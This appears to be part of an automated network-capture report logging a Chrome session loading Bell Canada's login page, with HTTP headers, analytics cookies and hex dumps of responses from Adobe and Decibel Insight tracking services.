                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                      119192.168.2.94991052.214.60.574433100C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:10 UTC519OUTGET /id?d_visid_ver=5.5.0&d_fieldgroup=MC&d_rtbd=json&d_ver=2&d_orgid=48B034FA53CF9FD10A490D44%40AdobeOrg&d_nsid=0&ts=1730380327750 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Host: dpm.demdex.net
                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                      Cookie: demdex=26594250982175076714259318767746782479
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:11 UTC713INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:11 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: application/json;charset=utf-8
                                                                                                                                                                                                                                                                                                                                      Content-Length: 2318
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      X-TID: o11ni+3SQSU=
                                                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache,no-store,must-revalidate,max-age=0,proxy-revalidate,no-transform,private
                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                      Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                                                                                                                                                                                                                                                                                      P3P: policyref="/w3c/p3p.xml", CP="NOI NID CURa ADMa DEVa PSAa PSDa OUR SAMa BUS PUR COM NAV INT"
                                                                                                                                                                                                                                                                                                                                      DCS: dcs-prod-irl1-1-v067-0e9fa4ffc.edge-irl1.demdex.com 3 ms
                                                                                                                                                                                                                                                                                                                                      set-cookie: demdex=26594250982175076714259318767746782479; Max-Age=15552000; Expires=Tue, 29 Apr 2025 13:12:11 GMT; Path=/; Domain=.demdex.net; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:11 UTC2318INData Raw: 7b 22 64 5f 6d 69 64 22 3a 22 32 36 34 30 34 36 39 30 32 34 30 39 39 38 37 34 37 31 32 34 32 37 34 31 35 36 30 33 36 34 35 32 33 37 39 30 37 32 22 2c 22 69 64 5f 73 79 6e 63 5f 74 74 6c 22 3a 36 30 34 38 30 30 2c 22 64 5f 62 6c 6f 62 22 3a 22 52 4b 68 70 52 7a 38 6b 72 67 32 74 4c 4f 36 70 67 75 58 57 70 35 6f 6c 6b 41 63 55 6e 69 51 59 50 48 61 4d 57 57 67 64 4a 33 78 7a 50 57 51 6d 64 6a 30 79 22 2c 22 64 63 73 5f 72 65 67 69 6f 6e 22 3a 36 2c 22 64 5f 6f 74 74 6c 22 3a 37 32 30 30 2c 22 69 62 73 22 3a 5b 7b 22 69 64 22 3a 22 34 31 31 22 2c 22 74 74 6c 22 3a 31 30 30 38 30 2c 22 74 61 67 22 3a 22 69 6d 67 22 2c 22 66 69 72 65 55 52 4c 53 79 6e 63 22 3a 31 2c 22 73 79 6e 63 4f 6e 50 61 67 65 22 3a 31 2c 22 75 72 6c 22 3a 5b 22 2f 2f 63 6d 2e 65 76 65 72
                                                                                                                                                                                                                                                                                                                                      Data Ascii: {"d_mid":"26404690240998747124274156036452379072","id_sync_ttl":604800,"d_blob":"RKhpRz8krg2tLO6pguXWp5olkAcUniQYPHaMWWgdJ3xzPWQmdj0y","dcs_region":6,"d_ottl":7200,"ibs":[{"id":"411","ttl":10080,"tag":"img","fireURLSync":1,"syncOnPage":1,"url":["//cm.ever


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                      120192.168.2.94991134.250.133.1954433100C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:10 UTC752OUTGET /dest5.html?d_nsid=0 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Host: bellca.demdex.net
                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: iframe
                                                                                                                                                                                                                                                                                                                                      Referer: https://mybell.bell.ca/
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                      Cookie: demdex=26594250982175076714259318767746782479
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:11 UTC607INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:11 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html;charset=UTF-8
                                                                                                                                                                                                                                                                                                                                      Content-Length: 6983
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      X-TID: EEnt+t8mSCw=
                                                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache,no-store,must-revalidate,max-age=0,proxy-revalidate,no-transform,private
                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                      Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                                                                                                                                                                                                                                                                                      P3P: policyref="/w3c/p3p.xml", CP="NOI NID CURa ADMa DEVa PSAa PSDa OUR SAMa BUS PUR COM NAV INT"
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      last-modified: Wed, 16 Oct 2024 09:33:45 GMT
                                                                                                                                                                                                                                                                                                                                      DCS: dcs-prod-irl1-2-v067-019e7c767.edge-irl1.demdex.com 0 ms
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:11 UTC6983INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 41 64 6f 62 65 20 41 75 64 69 65 6e 63 65 4d 61 6e 61 67 65 72 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Adobe AudienceManager</title><script type="text/javas


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                      121192.168.2.949918130.61.120.24433100C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:11 UTC576OUTGET /i/14028/693653/c.json HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Host: collection.decibelinsight.net
                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                      Origin: https://mybell.bell.ca
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                      Referer: https://mybell.bell.ca/
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:11 UTC1142INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:11 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                                                                                                                                                                                      Content-Length: 19814
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      x-di-debug: node=c112-248-eu-frankfurt-1 df=61472
                                                                                                                                                                                                                                                                                                                                      Cache-Control: private, max-age=1800
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: da_lid=-B7D567C29E92EA123347BB99E4B686613C|0|0|0; Path=/i/14028/; Domain=.decibelinsight.net; Max-Age=31536000; HttpOnly; SameSite=None; Secure
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: da_sid=84E654F18AD2AE89A616AA13A6B4CC6A8F.1|3|0|3; Path=/i/14028/; Domain=.decibelinsight.net; Max-Age=1800; HttpOnly; SameSite=None; Secure
                                                                                                                                                                                                                                                                                                                                      ETag: W/012546114-192E2B478BB
                                                                                                                                                                                                                                                                                                                                      Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Cache-Control, Pragma, If-None-Match, Accept, X-HTTP-Method-Override, X-DI-jspsf, X-DI-cookieflags, X-DI-sid, X-DI-lid, X-DI-lid-renew, X-DI-sid-renew, X-DI-lid-time, X-DI-int-state
                                                                                                                                                                                                                                                                                                                                      Access-Control-Max-Age: 604800
                                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://mybell.bell.ca
                                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000, h2=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:11 UTC7050INData Raw: 7b 22 64 61 5f 77 65 62 73 69 74 65 49 64 22 3a 36 39 33 36 35 33 2c 22 64 61 5f 61 63 63 6f 75 6e 74 5f 66 6c 61 67 73 22 3a 32 32 35 32 37 2c 22 64 61 5f 61 63 63 6f 75 6e 74 5f 66 6c 61 67 73 5f 6f 72 69 67 22 3a 32 32 35 32 37 2c 22 64 61 5f 73 65 73 73 69 6f 6e 49 64 5f 65 22 3a 22 38 34 45 36 35 34 46 31 38 41 44 32 41 45 38 39 41 36 31 36 41 41 31 33 41 36 42 34 43 43 36 41 38 46 2e 31 22 2c 22 64 61 5f 6c 65 61 64 49 64 5f 65 22 3a 22 42 37 44 35 36 37 43 32 39 45 39 32 45 41 31 32 33 33 34 37 42 42 39 39 45 34 42 36 38 36 36 31 33 43 22 2c 22 64 61 5f 64 6e 73 52 65 63 6f 72 64 22 3a 22 63 6f 6c 6c 65 63 74 69 6f 6e 2e 64 65 63 69 62 65 6c 69 6e 73 69 67 68 74 2e 6e 65 74 22 2c 22 64 61 5f 61 6e 6f 6e 79 6d 69 73 65 49 50 22 3a 66 61 6c 73 65 2c
                                                                                                                                                                                                                                                                                                                                      Data Ascii: {"da_websiteId":693653,"da_account_flags":22527,"da_account_flags_orig":22527,"da_sessionId_e":"84E654F18AD2AE89A616AA13A6B4CC6A8F.1","da_leadId_e":"B7D567C29E92EA123347BB99E4B686613C","da_dnsRecord":"collection.decibelinsight.net","da_anonymiseIP":false,
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:11 UTC8192INData Raw: 64 72 65 73 73 5f 73 65 6c 65 63 74 69 6f 6e 22 2c 22 5f 67 69 64 5f 36 22 3a 22 23 63 6f 6e 74 69 6e 75 65 5f 72 65 76 69 65 77 5f 6f 72 64 65 72 22 2c 22 5f 67 69 64 5f 37 22 3a 22 23 73 75 62 6d 69 74 22 7d 2c 22 64 61 5f 66 6f 72 6d 43 6f 6c 6c 65 63 74 69 6f 6e 22 3a 32 2c 22 64 61 5f 66 6f 72 6d 47 72 6f 75 70 43 72 69 74 65 72 69 61 22 3a 22 64 69 2d 69 64 2c 69 64 2c 6e 61 6d 65 2c 68 61 73 68 2c 75 72 6c 22 2c 22 64 61 74 61 4c 61 79 65 72 52 75 6c 65 73 22 3a 5b 7b 22 63 6f 6e 76 65 72 74 65 64 45 76 65 6e 74 22 3a 7b 22 6e 61 6d 65 22 3a 22 63 6c 69 63 6b 22 2c 22 74 61 72 67 65 74 22 3a 22 23 62 74 6e 53 75 62 6d 69 74 42 79 4e 65 77 43 75 73 74 6f 6d 65 72 42 75 74 74 6f 6e 22 7d 2c 22 61 63 74 69 6f 6e 22 3a 7b 22 6e 61 6d 65 22 3a 22 73 65
                                                                                                                                                                                                                                                                                                                                      Data Ascii: dress_selection","_gid_6":"#continue_review_order","_gid_7":"#submit"},"da_formCollection":2,"da_formGroupCriteria":"di-id,id,name,hash,url","dataLayerRules":[{"convertedEvent":{"name":"click","target":"#btnSubmitByNewCustomerButton"},"action":{"name":"se
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:11 UTC4572INData Raw: 77 76 71 2c 31 64 32 36 35 39 6f 2c 31 74 62 65 63 6d 66 2c 31 61 71 78 6b 70 39 2c 64 69 36 69 30 79 2c 31 6d 37 77 7a 78 2c 6a 72 37 39 6a 7a 2c 31 6e 68 36 67 68 77 2c 31 65 62 62 76 33 76 2c 6c 37 65 31 36 63 2c 31 6b 30 6a 39 63 65 2c 36 36 71 71 67 72 2c 31 64 74 6a 6c 37 62 2c 31 6e 72 63 62 74 30 2c 64 69 76 66 70 39 2c 31 61 73 6e 6c 6f 63 2c 33 34 72 73 70 66 2c 31 70 71 63 30 75 6e 2c 6a 31 76 63 6f 73 2c 31 76 75 38 77 33 75 2c 6e 69 61 78 74 71 2c 31 64 71 6a 64 7a 2c 31 65 67 75 78 66 36 2c 62 76 68 61 70 75 2c 31 61 38 34 37 74 62 2c 61 6f 33 64 6b 79 2c 31 38 68 6c 70 35 35 2c 31 31 37 65 35 6e 61 2c 39 6c 66 79 37 69 2c 6a 71 64 65 77 67 2c 36 36 34 68 31 67 2c 31 62 65 32 6b 33 6d 2c 6a 73 76 78 6a 32 2c 72 68 36 72 70 6a 2c 34 6d 6d 30
                                                                                                                                                                                                                                                                                                                                      Data Ascii: wvq,1d2659o,1tbecmf,1aqxkp9,di6i0y,1m7wzx,jr79jz,1nh6ghw,1ebbv3v,l7e16c,1k0j9ce,66qqgr,1dtjl7b,1nrcbt0,divfp9,1asnloc,34rspf,1pqc0un,j1vcos,1vu8w3u,niaxtq,1dqjdz,1eguxf6,bvhapu,1a847tb,ao3dky,18hlp55,117e5na,9lfy7i,jqdewg,664h1g,1be2k3m,jsvxj2,rh6rpj,4mm0


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                      122192.168.2.94991966.235.152.2254433100C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:11 UTC3756OUTGET /m2/bellcanada/mbox/json?mbox=target-global-mbox&mboxSession=e8acc2285415480dbbf54ad6f854a96e&mboxPC=&mboxPage=38354bc94d0a493099a306274bc21c84&mboxRid=37fe7f796df14429b4eff85641053e61&mboxVersion=1.8.2&mboxCount=1&mboxTime=1730365927825&mboxHost=mybell.bell.ca&mboxURL=https%3A%2F%2Fmybell.bell.ca%2FLogin%3Flanguage%3Den&mboxReferrer=&browserHeight=907&browserWidth=1263&browserTimeOffset=-240&screenHeight=1024&screenWidth=1280&colorDepth=24&devicePixelRatio=1&screenOrientation=landscape&webGLRenderer=ANGLE%20%28Google%2C%20Vulkan%201.3.0%20%28SwiftShader%20Device%20%28Subzero%29%20%280x0000C0DE%29%29%2C%20SwiftShader%20driver%29&lob=&dflob=&language=en&province=on&footprint=&PostalCode=&LoggedInStatus=false&epp_company_code=dock%20is%20not%20present%3Ai&profile.IspCheckAvail=false&mboxMCSDID=03870B84460DADFF-291E557ADEB59CD2&mboxMCGVID=26404690240998747124274156036452379072&mboxAAMB=6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y&mboxMCGLH=6 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Host: somni.bell.ca
                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                      Origin: https://mybell.bell.ca
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                      Referer: https://mybell.bell.ca/
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                      Cookie: BSCC=LoginSplashReturnURL=%2fLogin%3flanguage%3den; 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; lanAkamaPro=A5IztOKSAQAAfK0hC-Sd8xQWQaTBAexuZE_ULjNr2v-63nNi-QEd9JDirAQvAa3--k2ucgHcwH8AAEB3AAAAAA|1|0|5936127134d4a7470b6c18b8f02213c4d723e799; TLP02ce4a58=028702b9c93a131f183946e5fba2da8acf4264474085a115a62dcd733137452f4305eb2ab84ad0304b853df666ee8067949b77e11784af563bbdb36d1d3f79fb6950541b57; rxVisitor=17303803184158NV4F74O1KFTJ2EO5K4UAGQSTA0OEH7F; dtPC=8$580318412_852h1vOSR [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:11 UTC679INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      date: Thu, 31 Oct 2024 13:12:11 GMT
                                                                                                                                                                                                                                                                                                                                      content-type: application/json;charset=UTF-8
                                                                                                                                                                                                                                                                                                                                      content-length: 2323
                                                                                                                                                                                                                                                                                                                                      vary: origin,access-control-request-method,access-control-request-headers,accept-encoding
                                                                                                                                                                                                                                                                                                                                      access-control-allow-origin: https://mybell.bell.ca
                                                                                                                                                                                                                                                                                                                                      access-control-allow-credentials: true
                                                                                                                                                                                                                                                                                                                                      x-request-id: 37fe7f796df14429b4eff85641053e61
                                                                                                                                                                                                                                                                                                                                      pragma: no-cache
                                                                                                                                                                                                                                                                                                                                      timing-allow-origin: *
                                                                                                                                                                                                                                                                                                                                      referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                                      server: jag
                                                                                                                                                                                                                                                                                                                                      strict-transport-security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                      cache-control: no-cache, no-store, max-age=0, no-transform, private
                                                                                                                                                                                                                                                                                                                                      x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                                                                      connection: close
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:11 UTC2323INData Raw: 7b 22 73 65 73 73 69 6f 6e 49 64 22 3a 22 65 38 61 63 63 32 32 38 35 34 31 35 34 38 30 64 62 62 66 35 34 61 64 36 66 38 35 34 61 39 36 65 22 2c 22 74 6e 74 49 64 22 3a 22 65 38 61 63 63 32 32 38 35 34 31 35 34 38 30 64 62 62 66 35 34 61 64 36 66 38 35 34 61 39 36 65 2e 33 37 5f 30 22 2c 22 6f 66 66 65 72 73 22 3a 5b 7b 22 70 6c 75 67 69 6e 73 22 3a 5b 22 3c 73 63 72 69 70 74 20 74 79 70 65 3d 5c 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 5c 22 3e 5c 72 5c 6e 2f 2a 6d 62 6f 78 48 69 67 68 6c 69 67 68 74 2b 20 20 76 31 20 3d 3d 3e 20 52 65 73 70 6f 6e 73 65 20 50 6c 75 67 69 6e 2a 2f 5c 72 5c 6e 77 69 6e 64 6f 77 2e 74 74 4d 45 54 41 3d 28 74 79 70 65 6f 66 28 77 69 6e 64 6f 77 2e 74 74 4d 45 54 41 29 21 3d 27 75 6e 64 65 66 69 6e 65 64 27 29 3f 77 69
                                                                                                                                                                                                                                                                                                                                      Data Ascii: {"sessionId":"e8acc2285415480dbbf54ad6f854a96e","tntId":"e8acc2285415480dbbf54ad6f854a96e.37_0","offers":[{"plugins":["<script type=\"text/javascript\">\r\n/*mboxHighlight+ v1 ==> Response Plugin*/\r\nwindow.ttMETA=(typeof(window.ttMETA)!='undefined')?wi


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                      123192.168.2.94988452.9.108.2234433100C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:11 UTC3054OUTGET /getapploginpage HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Host: m.bell.ca
                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua-model: ""
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-User: ?1
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                      Cookie: BSCC=LoginSplashReturnURL=%2fLogin%3flanguage%3den; 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; lanAkamaPro=A5IztOKSAQAAfK0hC-Sd8xQWQaTBAexuZE_ULjNr2v-63nNi-QEd9JDirAQvAa3--k2ucgHcwH8AAEB3AAAAAA|1|0|5936127134d4a7470b6c18b8f02213c4d723e799; TLP02ce4a58=028702b9c93a131f183946e5fba2da8acf4264474085a115a62dcd733137452f4305eb2ab84ad0304b853df666ee8067949b77e11784af563bbdb36d1d3f79fb6950541b57; rxVisitor=17303803184158NV4F74O1KFTJ2EO5K4UAGQSTA0OEH7F; dtPC=8$580318412_852h1vOSR [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:11 UTC503INHTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                                                                                                      Server: openresty
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:11 GMT
                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: _s=S6c9HjLG1CKQ24ifOYUX5B5hCZzHCSe7lfumMUowKETY2281c4GOWO2X5PlM16AY; Max-Age=15724800; Path=/; Expires=Thu, 01 May 2025 13:12:11 GMT; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                                      Location: https://bell.app.link/9hb8rBafRwb?_p=c11334dc9a0760eee0188ee3efb2
                                                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains
